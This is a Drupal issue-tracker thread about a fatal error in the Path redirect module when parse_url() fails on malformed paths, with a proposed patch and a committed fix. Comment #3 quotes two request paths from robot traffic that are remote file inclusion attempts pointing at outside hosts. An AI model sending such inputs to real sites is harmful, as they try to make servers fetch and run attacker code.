bad paths cause fatal error
brad bulger - November 1, 2009 - 06:48
| Project: | Path redirect |
| Version: | 6.x-1.x-dev |
| Component: | Code |
| Category: | bug report |
| Priority: | normal |
| Assigned: | Unassigned |
| Status: | closed |
Jump to:
Description
we are getting hit by some robots trying to access non-existent paths on the site. the problem is that the path is not in a valid format, so parse_url() returns FALSE and issues a warning. the warning is annoying but we can ignore it. but because it doesn't return an array, this line in path_redirect.module:
$parsed = parse_url($path) + array('query' => NULL, 'fragment' => NULL);results in a fatal "Unsupported operand types" error.
i'm not sure what you would want to do in this case, but it looks like parse_url was just being used to pull off the query and fragment values, so using a default seems to work ok:
$parsed = array('query' => NULL, 'fragment' => NULL);
if ($pathparsed = parse_url($path)) {
$parsed = $pathparsed + $parsed;
}it might be better to use preg_match to get the components instead, to avoid the warning from parse_url(), but i'm not sure what the correct regex pattern would be to do that.
#1
Can you give me an example of an invalid url that was causing this so I can write a test condition?
#2
In the meantime I committed a fix in http://drupal.org/cvs?commit=283662.
#3
generally they're paths that have a complete URL in them somewhere, like these
/bi/threds.php=http://mywork09.com.br/tester.txt?
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://www.7806320.ru/image??
these have nothing to do with any real content or script names on the site, they're just opportunistic attempts to do something.
#4
Automatically closed -- issue fixed for 2 weeks with no activity.